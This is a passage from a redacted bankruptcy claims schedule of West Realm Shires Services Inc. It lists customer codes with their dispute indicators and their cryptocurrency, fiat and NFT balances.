| 07306690 | | BTC[.1664334], USD[2.00] | | |
| 07306694 | Contingent, Disputed | BTC[2.8005735], ETH[2.988], ETHW[2.988], USD[15.48] | | |
| 07306695 | | DAI[0], SOL[0], USD[0.27] | | |
| 07306699 | | ETH[0], ETHW[0], NFT (41762204284083087/Reflection '14 #16)[1], NFT (474451172244989017/Night Light #553)[1], NFT (488275912084855253/Ferris From Afar #116)[1], NFT (495768762732832414/Reflection '11 #44)[1], SOL[0], TRX[197.72634888], USD[0.00], USDT[0] | | |
| 07306708 | | AUD[0.00], BTC[0], CAD[0.00], CHF[0.00], EUR[0.00], GBP[0.00], HKD[0.00], SGD[0.00], USD[0.00], USDT[0.00000001], ZAR[0.00] | | |
| 07306717 | | USD[0.00], USDT[0] | Yes | |
| 07306722 | | USD[1.04] | | |
| 07306727 | | BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], MATIC[0], TRX[0], USD[0.01], USDT[0] | | |
| 07306729 | | BTC[.00000547], USD[0.01] | | |
| 07306731 | | USD[1070.85] | | |
| 07306735 | | BTC[0], USD[15.36], USDT[0] | | |
| 07306737 | | BTC[0.00008825], LINK[5.1948], USD[0.00] | | |
| 07306739 | | AVAX[.0457], BTC[0.00008950], DOGE[0.93980000], ETH[0.00072320], ETHW[0.00036220], LINK[0], MATIC[5.30400000], SOL[0.00070623], SUSHI[0], UNI[0.08992015], USD[11295.97] | | |
| 07306748 | | ETH[.00000001], USD[0.00] | | |
| 07306753 | | USD[0.00], USDT[0.00000001] | | |
| 07306754 | | USD[1.37], USDT[0.00000001] | | |
| 07306759 | | USD[13.40] | | |
| 07306767 | | NFT (405419687581400062/Coachella x FTX Weekend 1 #19629)[1], SOL[.04], TRX[.011594], USD[0.00], USDT[0.00000001] | | |
| 07306791 | | BTC[0], ETH[0], ETHW[0], SOL[50.00508693], USD[27.47], USDT[0] | | |
| 07306795 | | BTC[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07306797 | | BTC[0], LINK[.06] | | |
| 07306803 | | BTC[0], ETH[0], MATIC[0], SOL[.25], UNI[0], USD[0.00], USDT[0.00000002] | | |
| 07306804 | | SOL[1255.35923], USD[14287.78] | | |
| 07306811 | | ETH[0], TRX[0], UNI[0], USD[0.01] | | |
| 07306817 | | AAVE[0], SOL[0.00000001], USD[0.00] | | |
| 07306826 | | USD[11.95] | | |
| 07306827 | | ETH[.000026], ETHW[.000026], LINK[.0495], USD[0.00], USDT[38.01545086] | | |
| 07306835 | | USD[10.00] | | |
| 07306836 | | USD[10.00] | | |
| 07306840 | | USD[116.63] | | |
| 07306868 | | USDT[1.3225] | | |
| 07306872 | | BTC[0], DOGE[0], GRT[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07306873 | | USD[15.14] | | |
| 07306881 | | USD[0.00] | | |
| 07306899 | | USD[0.01] | | |
| 07306905 | | BTC[0], ETH[0], LINK[.03986], MATIC[0], TRX[0], USD[75.38] | | |
| 07306918 | | USD[10.00] | | |
| 07306930 | | BCH[0.00081334], BTC[0], ETHW[.0007], USD[0.00], USDT[0] | | |
| 07306948 | | BCH[.005012], BTC[0.01459626], ETH[.005922], LINK[.1975], LTC[.07767], MATIC[31.867], SOL[.03549], SUSHI[3.9265], TRX[.000013], UNI[.1884], USD[0.00], USDT[1.9515676], YFI[.012076] | | |
| 07306956 | | DOGE[16.83168805], ETHW[.485], SOL[.0036], USD[0.73], USDT[0.07571629] | | |
| 07306960 | | USD[10.00] | | |
| 07306966 | | USD[9.42] | | |
| 07306971 | | USD[0.00] | | |
| 07306976 | | SOL[65.736], USD[0.34] | | |
| 07306980 | | USD[564.72], USDT[0] | | |
| 07306981 | | BTC[0.00004402], USD[0.00], USDT[2.09294469] | | |
| 07306986 | | BTC[0], USD[0.00] | | |
| 07306987 | | USD[0.00] | | |
| 07306988 | | USD[0.00] | | |
| 07306990 | | BTC[0], ETH[.00000001], ETHW[0], USD[0.59] | | |
| 07307000 | | ETH[.01319088], ETHW[.01319088] | | |
| 07307001 | | BTC[.00202419], SHIB[1], USD[0.00] | | |
| 07307007 | | NFT (538145908682154984/Coachella x FTX Weekend 2 #17644)[1] | | |
| 07307009 | | BTC[.0000682], TRX[.000051], USD[15.60], USDT[0.00113000] | | |
| 07307019 | | BTC[0], LTC[0], TRX[0], USD[2.82] | | |
| 07307029 | | USD[0.14] | | |
| 07307042 | | NFT (417865419550680133/FTX - Off The Grid Miami #1459)[1], USD[400.00], USDT[0.00031109] | | |
| 07307045 | | BTC[.1156039], USD[12.99], USDT[0], YFI[.048951] | | |
| 07307047 | | USD[0.38], USDT[0.00000495] | | |
| 07307050 | | USD[0.00] | | |
| 07307058 | | CUSDT[1], DOGE[3], ETH[.00113257], ETHW[.00111889], LTC[.00918793], NFT (531023711186813467/FTX US Hoodie #1)[1], SOL[.43690317], SUSHI[.11058329], UNI[.06725984], USD[0.00], YFI[.00004606] | Yes | |
| 07307059 | | USD[0.00] | | |
| 07307060 | | BCH[.000226], BTC[0], DOGE[.471], SOL[.0023], USD[1853.51] | | |
| 07307070 | | USD[10.00] | | |
| 07307073 | | BTC[0], USD[1.32] | | |
| 07307075 | | BTC[0.00004372], DOGE[.0984], ETH[.00037], ETHW[.00037], SUSHI[.48242895], USD[2.16], USDT[0.18238999] | | |
| 07307076 | | BTC[.0820704], DOGE[9645.102], ETH[5.058684], ETHW[5.058684], SOL[122.75720616], UNI[68.8236], USD[204.92], USDT[0.00000056] | | |
| 07307080 | | ETH[.0009026], ETHW[.0009026], SUSHI[.086], USD[18.88] | | |
| 07307081 | | USD[19.02] | | |
| 07307085 | | USD[0.91] | | |
| 07307089 | | USD[4.86], USDT[0.00000445] | | |
| 07307095 | | USD[0.41] | | |
| 07307096 | | USD[0.00] | Yes | |
| 07307099 | | XRP[5] | | |
| 07307102 | | USD[0.00] | | |
| 07307103 | | BTC[0], ETH[.00000001], ETHW[40.59085815], NFT (379737756348809388/Barcelona Ticket Stub #1719)[1], NFT (565253379867499436/FTX - Off The Grid Miami #4977)[1], NFT (568832239131589469/Bahrain Ticket Stub #542)[1], USD[4867.67] | | |
| 07307107 | | ETHW[.09460542], NFT (395767450404276500/Entrance Voucher #2940)[1], NFT (403151943107925040/Sloth #1002)[1], NFT (415324784299012679/Sloth #0887)[1], NFT (453725971016920390/Lunarian #6556)[1], NFT (491851488545316843/Sloth #1210)[1], NFT (493259707720115640/Sloth #0943)[1], NFT (500175411873272436/Lunarian #1025)[1], SOL[.15902579], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07307109 | | LINK[.09128], LTC[.00614], SOL[0.02520000], USD[0.67], USDT[1.19704392] | | |
| 07307114 | | BTC[0], TRX[.000004], USD[1.40], USDT[0.00477101] | | |
| 07307115 | | USD[37.94] | | |
| 07307117 | | BTC[.00000718], NFT (335860292094709035/2D Squid Game Legs)[1], NFT (432633725452601167/2D SOLDIER #586)[1], SOL[0.00606000], USD[0.00] | | |
| 07307123 | | BAT[1.01655549], BRZ[2], CUSDT[1], DOGE[3], TRX[1], USD[0.01] | Yes | |
| 07307124 | | USD[1.28] | | |
| 07307126 | | USD[11.08] | | |
| 07307127 | | BTC[0], ETH[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000001] | | |
| 07307140 | | BAT[1.0073479], BRZ[4], CUSDT[24], DAI[.85979892], DOGE[11.27607244], ETH[0], ETHW[.00001153], SHIB[42], SUSHI[.082], TRX[5], USD[0.34], USDT[31.16984368] | | |
| 07307144 | | BTC[0.01415415], DOGE[.94], ETH[.545226], ETHW[.545226], LINK[6.3297], LTC[.00823], SOL[3], USD[2.13], USDT[1.9955424] | | |
| 07307146 | | NFT (435050857491981296/Series 1 #1)[1], USD[0.00], USDT[0] | | |
| 07307149 | | USD[120.65], USDT[12.577905] | | |
| 07307156 | | BTC[0], DOGE[1.08115123], ETH[0], SUSHI[0], USD[0.00] | | |
| 07307159 | | NFT (373041594067768550/Juliet #618)[1], NFT (528364385727930850/Humpty Dumpty #671)[1], USD[10.00] | | |
| 07307162 | | USD[10.00] | | |
| 07307170 | | USD[10.00] | | |
| 07307171 | | USD[10.00] | | |
| 07307172 | | USD[0.55] | | |
| 07307177 | | USD[10.00] | | |
| 07307178 | | USD[10.00] | | |
| 07307180 | | USD[10.00] | | |
| 07307187 | | BRZ[1], BTC[.00000022], DOGE[2], MATIC[.00025307], SHIB[1], USD[0.00] | Yes | |
| 07307189 | | USD[1.85] | | |
| 07307190 | | BTC[0], SOL[0], USD[0.00], USDT[0.00001017] | | |
| 07307192 | | BCH[.00000547], BTC[0], USDT[0] | | |
| 07307193 | | USD[10.00] | | |
| 07307197 | Contingent, Disputed | BTC[0], USD[0.44] | | |
| 07307199 | | WBTC[0] | | |
| 07307206 | | NFT (398734644085294394/Rescue)[1] | | |
| 07307207 | | BTC[0], KSHIB[1550], USD[0.51], USDT[0.00000001] | | |
| 07307213 | | BTC[0], SOL[.0475], USD[0.00], USDT[0] | | |
| 07307216 | | BTC[0], DOGE[0.73339857], USD[0.00], USDT[0] | | |
| 07307217 | | BTC[.008964], ETH[.618516], ETHW[.618516], GRT[991.572], SOL[.668], SUSHI[.192], UNI[74.9428], USD[0.28], USDT[0] | | |
| 07307225 | | LINK[1.38450453], USD[0.00] | | |
| 07307228 | | BTC[0], MATIC[0], NFT (547403023819238025/Entrance Voucher #4071)[1], USD[1.09] | | |
| 07307233 | | ETH[.00062945], ETHW[0.00062944], USD[0.00] | | |
| 07307239 | | BTC[0.00001937], USD[2.15], USDT[0] | | |
| 07307244 | | USD[4.21] | | |
| 07307249 | | ETH[.069], ETHW[.069], SOL[.00000001], USD[0.60] | | |
| 07307250 | | BTC[0.00000001], ETH[.00000001], SOL[.001608], USD[0.00] | | |
| 07307252 | | ETH[0], ETHW[.00000096], NFT (493879516314326843/Entrance Voucher #6488)[1], NFT (509023153465903071/Humpty Dumpty #1075)[1], USD[0.00], USDT[0.00000002] | | |
| 07307255 | | USD[0.29] | | |
| 07307259 | | BTC[0], USD[0.00] | | |
| 07307263 | | BTC[0], USD[16.63] | | |
| 07307266 | | BTC[0], MATIC[0], SHIB[23649.86745487], SOL[.00487666], USD[0.00], USDT[0.00015679] | | |
| 07307273 | | BTC[0], USD[152.46] | | |
| 07307281 | | SOL[.19499152], TRX[.000001], USDT[0.00000203] | | |
| 07307282 | | USD[1000.00] | | |
| 07307283 | | ETH[.00453028], ETHW[0.00453028] | | |
| 07307299 | | USD[1.49] | | |
| 07307300 | | DOGE[.66], USD[0.53] | | |
| 07307304 | | BF_POINT[300], BTC[0], ETH[0], ETHW[0], SOL[0], USD[0.00] | | |
| 07307305 | | USD[81.09] | | |
| 07307306 | | BTC[0], ETH[0] | | |
| 07307312 | | BTC[0], SOL[0], SUSHI[0.01579129], TRX[0], USD[0.00] | | |
| 07307315 | | BTC[0], TRX[1233.048], USDT[.961882] | | |
| 07307316 | | USD[0.00] | | |
| 07307321 | | BTC[0.00000875], DOGE[.7146], SUSHI[.23869], USD[0.25], USDT[1.16832955] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07307324 | | DOGE[5220.84000981], USD[6.56], USDT[0.00000001] | | |
| 07307329 | | USD[24.30] | | |
| 07307330 | | SOL[.30904889], USD[9.61] | | |
| 07307331 | | USD[6.97] | | |
| 07307337 | | SOL[13.69316564], SUSHI[0], USD[0.00] | | |
| 07307340 | | TRX[.000003], USD[0.00], USDT[0] | | |
| 07307348 | | BTC[0], NFT (527742767656733039/Magic Eden Prime)[1], SOL[.0099] | | |
| 07307351 | | SOL[6.69], YFI[.0386] | | |
| 07307352 | | USD[10.00] | | |
| 07307354 | | LTC[.00696], USD[1.01] | | |
| 07307356 | | SOL[29.47314], USD[4002.38] | | |
| 07307362 | | ETH[.00026711], ETHW[0.00026710], SOL[0], USDT[0.95253978] | | |
| 07307366 | | BTC[-0.07258094], ETH[1.07089069], ETHW[50.986412], SOL[0.00956892], USD[139.03], USDT[13.25567298] | | |
| 07307367 | | USD[1.56] | | |
| 07307368 | | USD[0.00] | | |
| 07307373 | | BTC[0.00782680], DOGE[2.529], ETH[.000986], ETHW[.000986], LINK[.0034], MATIC[9.98], TRX[.778], UNI[.07], USD[6.67], USDT[0], YFI[.000994] | | |
| 07307376 | | SUSHI[.29414662], USD[0.00], USDT[.000013] | | |
| 07307379 | | UNI[3.0376], USD[2.36], USDT[228.11097440] | | |
| 07307387 | | BTC[.03602888], ETH[0.54556207], ETHW[0.54556207], SOL[1.13968], USD[1.48] | | |
| 07307394 | | BTC[0.00000001], DOGE[.385], ETH[0.00000001], ETHW[0], SOL[0], USD[2550.97], USDT[0.00000001] | | |
| 07307398 | | BTC[.0000959], DOGE[0], ETH[.00067931], ETHW[0.00067931], SOL[0], TRX[0], USDT[.0786275] | | |
| 07307402 | | SOL[.02], USD[0.34] | | |
| 07307405 | | ETH[.0003], ETHW[.0003], USD[1.07] | | |
| 07307414 | | BTC[.0000948], DOGE[0], USD[0.00] | | |
| 07307417 | | LINK[40.7592], USD[3.19] | | |
| 07307419 | | NFT (311029583487993824/Entrance Voucher #29694)[1], SOL[0], USD[0.00] | | |
| 07307423 | | USD[100.00] | | |
| 07307429 | | ETH[.00000001], TRX[0] | | |
| 07307434 | | USD[10.00] | | |
| 07307446 | | SOL[3.34056641], USD[0.00] | | |
| 07307448 | | ETH[0.00051707], ETHW[0.00051707], NFT (315772891810137485/David #421)[1], SOL[0.00780677], USD[0.00], USDT[0] | | |
| 07307450 | | SOL[1.31], USD[0.37] | | |
| 07307454 | | USD[10.00] | | |
| 07307455 | | USD[10.00] | | |
| 07307462 | | USD[0.00] | | |
| 07307464 | | USD[0.00], USDT[0] | | |
| 07307465 | | USD[10.00] | | |
| 07307471 | | USDT[0] | | |
| 07307476 | | BTC[0], ETH[.11404806], ETHW[.11404806], USD[0.00] | | |
| 07307482 | | BTC[0], DOGE[321.55], ETH[.000955], ETHW[.000955], SOL[12.5914], SUSHI[.3755], TRX[.948], USDT[1.88244292] | | |
| 07307484 | | BRZ[4], BTC[.02564028], DOGE[4], SHIB[19], SOL[2.26399476], TRX[5], USD[4.92] | Yes | |
| 07307500 | | NFT (378354660675559184/FTX - Off The Grid Miami #790)[1] | | |
| 07307505 | | NFT (302745196161098937/Shaq's Fun House Commemorative Ticket #202)[1], USD[0.00], USDT[0] | | |
| 07307510 | | BTC[0.00001827], USDT[0.00886413] | | |
| 07307514 | | USD[0.00] | | |
| 07307516 | | USD[500.00] | | |
| 07307525 | | BAT[2], DOGE[1], SHIB[1], USD[0.00] | | |
| 07307530 | | USD[0.00] | | |
| 07307536 | | NFT (556888636479823890/Bahrain Ticket Stub #2079)[1], USD[0.26] | | |
| 07307538 | Contingent, Disputed | BTC[0.00400000], DOGE[0], ETH[0.10769091], ETHW[0.10769091], GRT[100.40494890], LTC[0], SUSHI[0] | | |
| 07307572 | | TRX[.000003], USD[13.93], USDT[.00248] | | |
| 07307574 | | USD[0.00] | | |
| 07307576 | | BTC[0.00003990] | | |
| 07307583 | | USD[0.00] | | |
| 07307588 | | BTC[0.00004926], ETHW[0.09300000], SOL[.00493903], USD[132.27], USDT[0] | | |
| 07307613 | | GRT[.737], USD[0.24] | | |
| 07307618 | | NFT (318885635643675046/Bahrain Ticket Stub #1060)[1], SOL[0], USD[4.81] | Yes | |
| 07307623 | | BTC[0], DOGE[14.88], USD[0.07], USDT[0.00657455] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07307625 | | ETH[0], ETHW[0], SOL[0], USD[0.00], USDT[0] | | |
| 07307626 | | BTC[0], ETHW[0], NFT (380582856739773319/The Hill by FTX #7155)[1], NFT (490357979820748577/FTX Crypto Cup 2022 Key #3148)[1], SOL[0], USD[1.40] | | |
| 07307637 | | NFT (306817532839376253/Solana Summer Monkeys #1)[1], NFT (442546280628259153/Culinary Photos #1)[1] | | |
| 07307653 | | USD[100.00] | | |
| 07307678 | | USD[0.46] | | |
| 07307693 | | USD[10.00] | | |
| 07307695 | | BAT[0], USD[0.00] | | |
| 07307714 | | BTC[0.00301743], GRT[0], TRX[0], USD[1.87], USDT[0.03093271] | | |
| 07307721 | | DOGE[4.995], USD[0.06] | Yes | |
| 07307735 | | BAT[28.42286691], MATIC[10.14232176], UNI[1.2170785], USD[0.31] | Yes | |
| 07307753 | | USD[0.01] | | |
| 07307754 | | USD[0.00] | | |
| 07307756 | | NFT (527381097313927304/Saudi Arabia Ticket Stub #294)[1] | | |
| 07307770 | | SHIB[2], USD[0.00] | | |
| 07307788 | | USD[0.00], USDT[0.00000001] | | |
| 07307801 | | DOGE[.561], SUSHI[.39093271], TRX[.928002], USD[0.51], USDT[0] | | |
| 07307805 | | SOL[.01357197], USD[0.00] | | |
| 07307807 | | BAT[2878.437], BTC[0.10907538], ETH[.383], ETHW[.383], SOL[113.4003], USD[1.33] | | |
| 07307837 | | BTC[0], USD[0.00] | | |
| 07307838 | | BTC[.00011368], USD[0.00] | | |
| 07307839 | | BTC[0], DOGE[0], USD[0.05] | | |
| 07307846 | | USD[0.00] | | |
| 07307849 | | BTC[.06987], USD[2.36] | | |
| 07307850 | | BTC[.00004544], USD[0.24] | | |
| 07307853 | | NFT (503721720719068210/Collage 1)[1], SOL[1.36386904], USD[24.96] | | |
| 07307860 | | ETH[.000263], ETHW[.220263], USD[0.55] | | |
| 07307863 | | BTC[0], USD[0.00] | | |
| 07307887 | | BTC[0], ETH[.00000001], USD[3.10] | | |
| 07307904 | | BTC[0], MATIC[.00000001], USD[0.00], USDT[0] | | |
| 07307911 | | BTC[.02971124] | | |
| 07307914 | | BTC[0], SUSHI[18.4815] | | |
| 07307921 | | DOGE[0.94280079], TRX[1305.02344229], USD[0.00] | | |
| 07307924 | | NFT (506140693238612681/The 2974 Collection #1627)[1], NFT (532679908095263223/2974 Floyd Norman - CLE 5-0095)[1], NFT (555294644673576494/Birthday Cake #1627)[1] | | |
| 07307926 | | BTC[0], USDT[0] | | |
| 07307936 | | USD[0.01] | | |
| 07307958 | Contingent, Disputed | DAI[0], ETH[0], ETHW[0], NFT (300092128367119237/Sunset #434)[1], NFT (300303677294763723/Cosmic Creations #758)[1], NFT (384833348987728245/Reflection '10 #79)[1], NFT (472113907880787006/Night Light #674)[1], NFT (494931671725573397/The Hill by FTX #4072)[1], NFT (500160810618264490/Spectra #518)[1], NFT (528315395068240749/FTX - Off The Grid Miami #850)[1], NFT (567190145726914580/Humpty Dumpty #871)[1], USD[0.00] | | |
| 07307972 | Contingent, Unliquidated | NFT (475705930142817641/4 inch Tungsten Cube)[1], SOL[.46953], TRX[.00001], USD[25.01] | | |
| 07307975 | | SUSHI[9.462], USD[0.81] | | |
| 07307980 | | BTC[0.00003146] | | |
| 07307984 | | USD[2000.00] | | |
| 07307989 | | TRX[633.456], USD[0.24] | | |
| 07307990 | | BCH[0], BTC[0.00000004], ETH[0.00000003], ETHW[0.00000001], LTC[0.00000002], USD[0.00], YFI[0] | | |
| 07308016 | | ETH[.02217181], ETHW[.02217181] | | |
| 07308019 | | BCH[.00626], BTC[0.00006696], DOGE[9039.69], ETH[.000526], ETHW[.000526], GRT[8.912], LINK[.2624], SOL[.0003], SUSHI[.9075], TRX[.772], USD[0.99], USDT[13.01387988] | | |
| 07308020 | | USD[0.00] | | |
| 07308021 | | BTC[0], SOL[.0000598], USD[0.00] | | |
| 07308042 | | SUSHI[.4995], USD[0.04] | | |
| 07308046 | | NFT (399764362950323067/Saudi Arabia Ticket Stub #841)[1] | | |
| 07308061 | | DOGE[0], LINK[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07308063 | | USD[0.00], USDT[0] | | |
| 07308082 | | USD[8651.41] | | |
| 07308098 | | USDT[0.00033607] | | |
| 07308106 | | USD[0.07] | | |
| 07308114 | | BTC[.00037801], USD[0.59] | | |
| 07308115 | | DOGE[8236.90555765], ETH[2.60813454], ETHW[2.60701531], SOL[68.25899333], USD[7.89] | Yes | |
| 07308127 | | USD[0.87], USDT[0] | | |
| 07308130 | | SOL[0.00585902], USD[0.13] | | |

West Realm Shires Services Inc.

Redacted FD Schedule F-152 priority Unsecured customer claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07308133 | | AVAX[2.41638339], USD[0.00] | | |
| 07308136 | | DOGE[13.67605736], USD[0.12] | | |
| 07308137 | | BTC[0], DOGE[0], TRX[0.90654611], USD[0.00], USDT[0] | | |
| 07308140 | | USD[10.00] | | |
| 07308143 | | USD[2.08] | | |
| 07308158 | | USD[10.00] | | |
| 07308165 | | AVAX[136.2216], BTC[0.08229682], DAI[.07000978], ETH[0.71208980], ETHW[14.47252180], GRT[4909.086], LINK[797.885], MATIC[-626.79875945], SOL[0.85526834], SUSHI[200], USD[23078.25], USDT[1.69916970] | | |
| 07308171 | | USD[10.00] | | |
| 07308173 | | FTX_EQUITY[0], NFT [294155079329534603/Pumpkin #44][1], NFT [294758141781178012/Goblin Experiment 7167][1], NFT [295155311027221529/Nyan Hero #4887][1], NFT [295645638813968864/Lunarian #5441][1], NFT [316179746353934620/MEGAMI #3988][1], NFT [318433429251155765/Whales Nation #6726][1], NFT [326044853861759536/Gloom Punk #2616][1], NFT [349524924162058855/The Hellions #1537][1], NFT [374141302635312838/Night Light #35][1], NFT [388386107723241734/SKYLINE #4604][1], NFT [395384778698929958/FTX - Off The Grid Miami #284][1], NFT [400036416790208538/Colossal Cacti #739][1], NFT [401630778327171909/Aural Light Collection on Solana #1][1], NFT [403402061576737233/Sentinel 3635][1], NFT [415381211658990167/Reflection '14 #28][1], NFT [418572739701635004/SolSoul-09584][1], NFT [428851989947202595/Hannya Mask][1], NFT [431765991329662801/Gen1 Mechdrop Token - Uncommon][1], NFT [438449577663050585/ChickenTribe #1592][1], NFT [440282282639128875/NYN IDO Pass][1], NFT [446147033601690989/Sun Set #887][1], NFT [466817082512888566/Belugie #1768][1], NFT [468253306097495837/Solanic Synesthesia #11][1], NFT [479464794976951256/Fortune Cookies #1243][1], NFT [480748722308336752/Skyline FLP][1], NFT [490093674227440857/Colossal Cacti #146][1], NFT [493633326371264504/Baby Whales #3202][1], NFT [494311217920393447/The Tower #466-7][1], NFT [521516825035837143/SolDad #456][1], NFT [528377878631080950/Humpty Dumpty #35][1], NFT [537152842836851569/Orcanauts #9350][1], NFT [537289646784660080/KAM! #7812][1], NFT [537949555755856732/The Hellions #1544][1], NFT [551374989323230139/Puppy #4461][1], USD[18.06], WEST_REALM_EQUITY_POSTSPLIT[0] | | |
| 07308178 | | USD[0.00], USDT[15.94834227] | | |
| 07308182 | | USD[94.20] | | |
| 07308188 | | AVAX[.0053], BTC[.0000783], ETH[.00000001], ETHW[0], GRT[1.8992], LINK[.1189003], MATIC[0.30600000], NEAR[.02816], NFT [319530460785163899/MagicEden Vaults][1], NFT [381946397158782770/MagicEden Vaults][1], NFT [384603556149267794/MagicEden Vaults][1], NFT [549528755992918583/MagicEden Vaults][1], NFT [569087525820514253/MagicEden Vaults][1], SHIB[0], SOL[0.00116400], SUSHI[.4697], USD[1.15], USDT[0.00185800] | | |
| 07308201 | | USD[10.00] | | |
| 07308203 | | BTC[.00018917] | | |
| 07308215 | | SHIB[999000], USD[4.22] | | |
| 07308242 | | TRX[.571], USD[94.13] | | |
| 07308246 | | BTC[0.10039817], DOGE[.991], ETH[.334628], ETHW[.334628], GRT[.981], SOL[4.161], USD[94.40], USDT[9.6274048], YFI[.00096] | | |
| 07308280 | | NFT [510454102918957259/Saudi Arabia Ticket Stub #1678][1] | | |
| 07308331 | | USD[0.00] | | |
| 07308346 | | USDT[3.935694] | | |
| 07308352 | | TRX[.00000001], USDT[0] | | |
| 07308374 | | NFT [348156633626210710/Birthday Cake #2422][1], NFT [409646801836202914/The 2974 Collection #2422][1], NFT [469189663555499955/2974 Floyd Norman - OKC 3-0207][1], USD[1.75] | | |
| 07308377 | | TRX[.011229] | | |
| 07308380 | | ETH[0], ETHW[0.77639299], SOL[0], USD[0.00] | | |
| 07308387 | | NFT [425867968341034699/Gangster Gorillas #3486][1], NFT [502050928746424547/Saudi Arabia Ticket Stub #261][1], NFT [552565806365256775/DOTB #5846][1], SOL[.02], USD[24.00] | | |
| 07308394 | | BTC[.0000981], DAI[5], ETH[.0189278], ETHW[.0189278], LINK[.06376], SOL[.001], USD[1600.63], USDT[0.00000001] | | |
| 07308435 | | USD[0.01], USDT[2.16375] | | |
| 07308438 | | USD[500.03] | | |
| 07308453 | | BTC[0], ETH[.0009], ETHW[.0009], UNI[0], USD[8.17] | | |
| 07308454 | | SOL[.0055944], USD[2.93] | | |
| 07308458 | Contingent, Disputed | BTC[0], ETH[0], ETHW[0], LINK[0], SOL[0], SUSHI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07308474 | | USD[0.00] | | |
| 07308477 | | USD[10.00] | | |
| 07308494 | | USD[10.00] | | |
| 07308499 | | LTC[4], USD[0.00] | | |
| 07308508 | | USD[10.00] | | |
| 07308512 | | USD[2000.00] | | |
| 07308513 | | USD[10.00] | | |
| 07308523 | | NFT [430285464227180005/Entrance Voucher #4182][1], SHIB[100000], SOL[6.5], USD[3.83] | | |
| 07308531 | | USD[0.00] | | |
| 07308535 | | NFT [542919553982622173/FTX - Off The Grid Miami #2680][1] | | |
| 07308548 | | BTC[0.00000001], ETH[0], ETHW[0], USD[0.01], USDT[-0.00690139] | | |
| 07308570 | | DOGE[.74], USD[0.00], USDT[0] | | |
| 07308572 | | NFT [503981097135100693/Microphone #262][1] | | |
| 07308574 | | BTC[0], ETH[.000209], ETHW[.000209], LINK[.008], SOL[.00341], SUSHI[.254], TRX[.808], UNI[.17676], USD[0.06], USDT[23.87860809] | | |
| 07308576 | | USD[0.00] | | |
| 07308579 | | USD[550.00] | | |
| 07308580 | | DOGE[329.58638967], ETH[.00000001], ETHW[0], TRX[0.16888817], USD[5.03] | | |
| 07308585 | | BTC[0], SOL[76.03463917] | | |
| 07308586 | | AAVE[0], MATIC[0], SOL[0], USD[0.00] | | |
| 07308606 | | ETH[.00498], ETHW[.00498], USD[0.94] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07308607 | | USD[0.34] | | |
| 07308613 | | USD[0.00] | | |
| 07308624 | | USD[0.00] | | |
| 07308629 | | BAT[0], BTC[0], ETH[0], GRT[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000111] | | |
| 07308644 | | BTC[0.10001484], SOL[.678], USD[0.01] | | |
| 07308647 | | USD[0.02] | | |
| 07308652 | Contingent, Disputed | DOGE[0.04247357], LINK[0], SHIB[12434386.39701907], SOL[0], SUSHI[0.44160620], UNI[0], USD[0.00] | | |
| 07308658 | | BTC[0], USD[4.05] | | |
| 07308668 | | USD[10.00] | | |
| 07308670 | | USD[10.00] | | |
| 07308671 | | USD[10.00] | | |
| 07308672 | | ETH[.168831], ETHW[.168831], USD[0.66] | | |
| 07308674 | | AUD[43.89], BAT[3.50000000], BCH[0], BRZ[284.45253565], BTC[0.00013003], CAD[1.00], CHF[1.00], CUSDT[1300.07107472], DOGE[11], ETH[.00230021], ETHW[.00230021], EUR[33.04], GBP[0.00], GRT[1], HKD[1.00], SGD[1.00], SOL[0.13827898], TRX[4], USD[119.24], USDT[5.97121812], ZAR[284.91] | | |
| 07308678 | | USD[0.00] | | |
| 07308682 | | BTC[.0015], USD[29.99] | | |
| 07308693 | | ETH[.00000002], ETHW[.0000002], USD[0.00] | | |
| 07308697 | | LINK[.0176], PAXG[.0000161], USD[0.53] | | |
| 07308698 | | BTC[0.00005675], ETH[0], ETHW[1.27974856], LTC[0], SOL[0.00072209], USD[0.01], USDT[0] | | |
| 07308700 | | DOGE[.74327488] | | |
| 07308701 | | USD[10.00] | | |
| 07308702 | | USD[10.00] | | |
| 07308703 | | USD[10.00] | | |
| 07308709 | | LTC[.00867], USD[0.04] | | |
| 07308715 | | USD[0.00], USDT[0] | | |
| 07308718 | | BTC[0.00132267], ETH[0], ETHW[0], GRT[63.32182463], SOL[1.00733061], SUSHI[6.77386091], TRX[.000005], UNI[2.48940387], USD[104.62], USDT[8.38457543] | | |
| 07308726 | | USD[100.00] | | |
| 07308739 | | ETH[0] | | |
| 07308742 | Contingent, Disputed | BTC[0], USD[0.00] | | |
| 07308763 | | BTC[0.00000965], USD[0.00], XRP[4.962] | | |
| 07308764 | | BTC[0.00001734], USD[0.00] | | |
| 07308770 | | ETH[0], ETHW[0.00015671], USD[0.00] | | |
| 07308772 | | BTC[0], SUSHI[.3395], USD[0.78] | | |
| 07308774 | | AVAX[0], BTC[0.00007227], ETH[0], ETHW[0], NFT [35238944127154117294/"EXCHANGE OFFER - EXCHANGE.ART"][1], NFT [450990922331507740/DinoBitten][1], SOL[0], USD[0.00], USDT[.00147] | | |
| 07308780 | | BTC[0], ETH[0], ETHW[0], SOL[0], USD[0.00], USDT[0] | | |
